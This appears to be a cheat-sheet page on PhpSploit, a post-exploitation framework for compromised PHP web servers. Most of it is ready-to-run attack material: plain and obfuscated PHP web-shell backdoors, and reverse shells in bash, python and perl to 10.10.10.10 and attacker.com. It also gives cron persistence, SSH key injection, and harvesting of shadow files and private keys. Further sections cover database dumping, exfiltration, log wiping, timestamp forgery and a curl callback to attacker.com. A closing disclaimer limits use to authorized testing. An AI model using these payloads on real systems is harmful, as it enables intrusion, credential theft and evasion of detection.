Aller au contenu
1337skills 1337skills - Aide-mémoires

PhpSploit

Overview

Section intitulée « Overview »

PhpSploit is a remote administration framework designed for stealth post-exploitation activities on compromised PHP web servers. It operates through hidden PHP backdoors, allowing attackers to interact with compromised systems while evading detection. The framework provides command execution, file management, and system enumeration capabilities.

Key Features:

  • Stealth PHP backdoor deployment
  • Interactive remote shell environment
  • File upload, download, and manipulation
  • System enumeration and reconnaissance
  • Memory-based operation (minimal disk footprint)
  • Anti-detection capabilities
  • Multi-session management

Installation

Section intitulée « Installation »

From GitHub

Section intitulée « From GitHub »
git clone https://github.com/nil0x42/phpsploit.git
cd phpsploit
chmod +x phpsploit

Requirements

Section intitulée « Requirements »
  • Python 3.6+
  • A web server with PHP execution capability
  • Target web server accessible

Verify Installation

Section intitulée « Verify Installation »
./phpsploit --version
./phpsploit --help

Docker

Section intitulée « Docker »
docker run -it --rm phpsploit

Basic Setup

Section intitulée « Basic Setup »

Start PhpSploit Console

Section intitulée « Start PhpSploit Console »
./phpsploit

Connect to Existing Backdoor

Section intitulée « Connect to Existing Backdoor »
phpsploit> connect http://target.com/shell.php

Deploy New Backdoor

Section intitulée « Deploy New Backdoor »
phpsploit> upload shell.php http://target.com/upload/

Interactive Shell

Section intitulée « Interactive Shell »
phpsploit> shell

Core Commands

Section intitulée « Core Commands »
CommandDescription
connectConnect to backdoor URL
uploadDeploy backdoor to server
downloadDownload file from server
shellInteractive command shell
runExecute system command
setConfigure framework settings
exploitRun exploitation modules
sessionsManage active sessions
helpDisplay command help
quitExit framework

Connection Management

Section intitulée « Connection Management »

Connect to Backdoor

Section intitulée « Connect to Backdoor »
phpsploit> connect http://target.com/index.php
phpsploit> connect http://target.com:8080/shell.php
phpsploit> connect http://target.com/admin/upload/shell.php

Connection with Proxy

Section intitulée « Connection with Proxy »
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> connect http://target.com/shell.php

Authentication

Section intitulée « Authentication »
phpsploit> set user admin
phpsploit> set password secret123
phpsploit> connect http://target.com/shell.php

Session Management

Section intitulée « Session Management »
phpsploit> sessions
phpsploit> sessions 1
phpsploit> sessions -k 1  # Kill session

Remote Command Execution

Section intitulée « Remote Command Execution »

Execute Single Command

Section intitulée « Execute Single Command »
phpsploit> run id
phpsploit> run whoami
phpsploit> run pwd
phpsploit> run uname -a

Interactive Shell Mode

Section intitulée « Interactive Shell Mode »
phpsploit> shell
[shell]> id
[shell]> whoami
[shell]> ls -la
[shell]> exit

Execute Shell Scripts

Section intitulée « Execute Shell Scripts »
phpsploit> run bash -c "for i in {1..10}; do echo $i; done"
phpsploit> run sh -c "cat /etc/passwd"
phpsploit> run perl -e 'print "Hello\n"'

Background Command Execution

Section intitulée « Background Command Execution »
phpsploit> run nohup bash -i >& /dev/tcp/attacker.com/4444 0>&1 &

File Operations

Section intitulée « File Operations »

Upload Files

Section intitulée « Upload Files »
phpsploit> upload /path/to/local/file.txt /var/www/html/
phpsploit> upload shell.php /var/www/html/uploads/
phpsploit> upload /path/to/payload.elf /tmp/

Download Files

Section intitulée « Download Files »
phpsploit> download /etc/passwd ./password_dump.txt
phpsploit> download /var/www/html/config.php ./config_backup.php
phpsploit> download /etc/shadow ./shadow_dump

List Remote Directory

Section intitulée « List Remote Directory »
phpsploit> run ls -la /var/www/html/
phpsploit> run find /var/www/html -type f -name "*.php"
phpsploit> run du -sh /var/www/html/*

Create/Modify Files

Section intitulée « Create/Modify Files »
phpsploit> run echo "<?php system(\$_GET['c']); ?>" > /var/www/html/shell.php
phpsploit> run cat > /tmp/malware.sh << EOF
# malware script here
EOF

System Enumeration

Section intitulée « System Enumeration »

Get System Information

Section intitulée « Get System Information »
phpsploit> run uname -a
phpsploit> run cat /etc/os-release
phpsploit> run hostnamectl
phpsploit> run whoami
phpsploit> run id

Network Information

Section intitulée « Network Information »
phpsploit> run ip addr show
phpsploit> run ifconfig
phpsploit> run netstat -tulpn
phpsploit> run ss -tulpn

Process Enumeration

Section intitulée « Process Enumeration »
phpsploit> run ps aux
phpsploit> run ps aux | grep -i apache
phpsploit> run ps aux | grep -i nginx

User and Privilege Information

Section intitulée « User and Privilege Information »
phpsploit> run cat /etc/passwd
phpsploit> run sudo -l
phpsploit> run cat /etc/sudoers

Disk and Storage Information

Section intitulée « Disk and Storage Information »
phpsploit> run df -h
phpsploit> run mount
phpsploit> run lsblk

Backdoor Deployment

Section intitulée « Backdoor Deployment »

PHP Backdoor Creation

Section intitulée « PHP Backdoor Creation »
# Simple one-liner backdoor
<?php system($_GET['cmd']); ?>

# More stealthy version
<?php if(isset($_POST['c'])){ echo "<pre>";system($_POST['c']);echo "</pre>"; } ?>

# Base64 encoded command execution
<?php system(base64_decode($_GET['x'])); ?>

Deploy Backdoor via PhpSploit

Section intitulée « Deploy Backdoor via PhpSploit »
phpsploit> upload backdoor.php /var/www/html/
phpsploit> connect http://target.com/backdoor.php

Obfuscated Backdoor

Section intitulée « Obfuscated Backdoor »
# Variable obfuscation
<?php $a="sy"."st"."em"; $a($_GET['c']); ?>

# Function indirection
<?php $f=create_function('$x','return system($x);'); echo $f($_GET['c']); ?>

Persistent Backdoor

Section intitulée « Persistent Backdoor »
# Write to web root with persistence
phpsploit> run echo '<?php system($_GET["c"]); ?>' > /var/www/html/.hidden/shell.php
phpsploit> run chmod 644 /var/www/html/.hidden/shell.php

Post-Exploitation Workflows

Section intitulée « Post-Exploitation Workflows »

Privilege Escalation Enumeration

Section intitulée « Privilege Escalation Enumeration »
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null
phpsploit> run find / -writable 2>/dev/null | head -20
phpsploit> run cat /etc/crontab

Credential Harvesting

Section intitulée « Credential Harvesting »
phpsploit> run cat /etc/shadow
phpsploit> run cat /home/*/.bash_history
phpsploit> run cat /root/.ssh/id_rsa

Lateral Movement

Section intitulée « Lateral Movement »
# Enumerate internal network
phpsploit> run nmap -sn 192.168.1.0/24
phpsploit> run arp -a

# Scan for open ports
phpsploit> run netstat -tulpn | grep LISTEN

Data Exfiltration

Section intitulée « Data Exfiltration »
# Tar and compress sensitive files
phpsploit> run tar -czf /tmp/data.tar.gz /var/www/html/

# Encode for exfiltration
phpsploit> run base64 /tmp/data.tar.gz > /tmp/data.b64

# Download exfiltrated data
phpsploit> download /tmp/data.b64 ./exfiltrated_data.b64

Advanced Configuration

Section intitulée « Advanced Configuration »

Set User Agent

Section intitulée « Set User Agent »
phpsploit> set user_agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
phpsploit> set user_agent "Custom-Agent/1.0"

Proxy Configuration

Section intitulée « Proxy Configuration »
phpsploit> set proxy http://127.0.0.1:8080
phpsploit> set proxy socks5://127.0.0.1:9050

Timeout Settings

Section intitulée « Timeout Settings »
phpsploit> set timeout 30
phpsploit> set connect_timeout 10

Request Headers

Section intitulée « Request Headers »
phpsploit> set headers "Authorization: Bearer token123"
phpsploit> set headers "X-Custom-Header: value"

Verbosity and Logging

Section intitulée « Verbosity and Logging »
phpsploit> set verbosity 3
phpsploit> set logging on
phpsploit> set log_file ./phpsploit.log

Exploitation Techniques

Section intitulée « Exploitation Techniques »

Reverse Shell Deployment

Section intitulée « Reverse Shell Deployment »
# Bash reverse shell
phpsploit> run bash -i >& /dev/tcp/10.10.10.10/4444 0>&1 &

# Python reverse shell
phpsploit> run python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.10.10',4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/sh','-i'])"

# Perl reverse shell
phpsploit> run perl -e "use Socket;$i='10.10.10.10';$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));connect(S,sockaddr_in($p,inet_aton($i)));exec('/bin/sh -i <&3 >&3 2>&3');"

Cron Job Persistence

Section intitulée « Cron Job Persistence »
phpsploit> run crontab -l
phpsploit> run (crontab -l; echo "* * * * * /bin/bash -i >& /dev/tcp/10.10.10.10/4444 0>&1") | crontab -

SSH Key Injection

Section intitulée « SSH Key Injection »
phpsploit> run mkdir -p /root/.ssh
phpsploit> run echo "ssh-rsa AAAA..." >> /root/.ssh/authorized_keys

Database Access

Section intitulée « Database Access »
phpsploit> run mysql -u root -ppassword -e "SHOW DATABASES;"
phpsploit> run mysql -u root -ppassword wordpress -e "SELECT user_login, user_pass FROM wp_users;"

Defense Evasion

Section intitulée « Defense Evasion »

Process Hiding

Section intitulée « Process Hiding »
# Run command disassociated from parent
phpsploit> run nohup /path/to/command &
phpsploit> run setsid /path/to/command

Timestamp Manipulation

Section intitulée « Timestamp Manipulation »
phpsploit> run touch -r /bin/ls /tmp/backdoor.php
phpsploit> run touch -t 202001010000 /tmp/backdoor.php

Log Sanitization

Section intitulée « Log Sanitization »
phpsploit> run cat /var/log/apache2/access.log | grep -v "shell.php"
phpsploit> run > /var/log/apache2/access.log
phpsploit> run cat /dev/null > ~/.bash_history

Firewall Bypass

Section intitulée « Firewall Bypass »
# DNS tunneling
phpsploit> run nslookup attacker.com

# HTTP tunneling
phpsploit> run curl http://attacker.com/callback?data=$(whoami)

Scripting and Automation

Section intitulée « Scripting and Automation »

Create PhpSploit Script

Section intitulée « Create PhpSploit Script »
#!/bin/bash
# automated_exploitation.sh

TARGET="http://target.com/shell.php"

phpsploit <<EOF
connect $TARGET
set verbosity 2
run id
run whoami
run pwd
run uname -a
download /etc/passwd ./passwd.txt
quit
EOF

Batch Command Execution

Section intitulée « Batch Command Execution »
phpsploit> run 'for i in {1..10}; do echo $i; done'
phpsploit> run 'find / -name "*.conf" 2>/dev/null | head -20'
phpsploit> run 'grep -r "password" /var/www/html 2>/dev/null'

Real-World Attack Scenarios

Section intitulée « Real-World Attack Scenarios »

Web Server Compromise

Section intitulée « Web Server Compromise »
# 1. Upload backdoor
phpsploit> upload backdoor.php /var/www/html/

# 2. Connect to backdoor
phpsploit> connect http://target.com/backdoor.php

# 3. Enumerate system
phpsploit> run uname -a
phpsploit> run id

# 4. Create persistence
phpsploit> run echo "<?php system($_GET['c']); ?>" > /var/www/html/.htaccess.php

Database Extraction

Section intitulée « Database Extraction »
# Identify database
phpsploit> run find / -name "*.env" | grep -i database

# Extract credentials
phpsploit> run cat /var/www/html/.env | grep DATABASE

# Dump database
phpsploit> run mysqldump -u root -p database > /tmp/dump.sql
phpsploit> download /tmp/dump.sql ./database_dump.sql

Application Server Escalation

Section intitulée « Application Server Escalation »
# Identify running services
phpsploit> run ps aux | grep -i "apache\|nginx\|tomcat"

# Check for vulnerable services
phpsploit> run netstat -tulpn

# Attempt local privilege escalation
phpsploit> run sudo -l
phpsploit> run find / -perm -4000 2>/dev/null

Troubleshooting

Section intitulée « Troubleshooting »

Connection Issues

Section intitulée « Connection Issues »
# Verify backdoor accessibility
curl http://target.com/shell.php

# Test with different encoding
phpsploit> set encoding base64
phpsploit> connect http://target.com/shell.php

Command Execution Problems

Section intitulée « Command Execution Problems »
# Test basic commands
phpsploit> run echo test
phpsploit> run id

# Check PHP version
phpsploit> run php --version

File Transfer Issues

Section intitulée « File Transfer Issues »
# Verify file permissions
phpsploit> run ls -la /var/www/html/

# Check available space
phpsploit> run df -h /var/www/html/

Security Best Practices

Section intitulée « Security Best Practices »

Operational Security

Section intitulée « Operational Security »
  • Use VPN/proxy for all connections
  • Rotate backdoor locations regularly
  • Clean logs and evidence of activity
  • Use encrypted communication when possible
  • Establish dead drops for communication

Detection Avoidance

Section intitulée « Detection Avoidance »
  • Use legitimate PHP functions
  • Avoid suspicious filenames
  • Minimize footprint on disk
  • Use appropriate timing for activities
  • Monitor system for detection indicators

Version and Support

Section intitulée « Version and Support »
./phpsploit --version
Section intitulée « Legal and Ethical Considerations »

Critical: PhpSploit is designed for authorized penetration testing and red team exercises only. Unauthorized access to computer systems is illegal. Always obtain explicit written authorization before deploying backdoors or conducting post-exploitation activities. Misuse of this framework may result in serious legal consequences.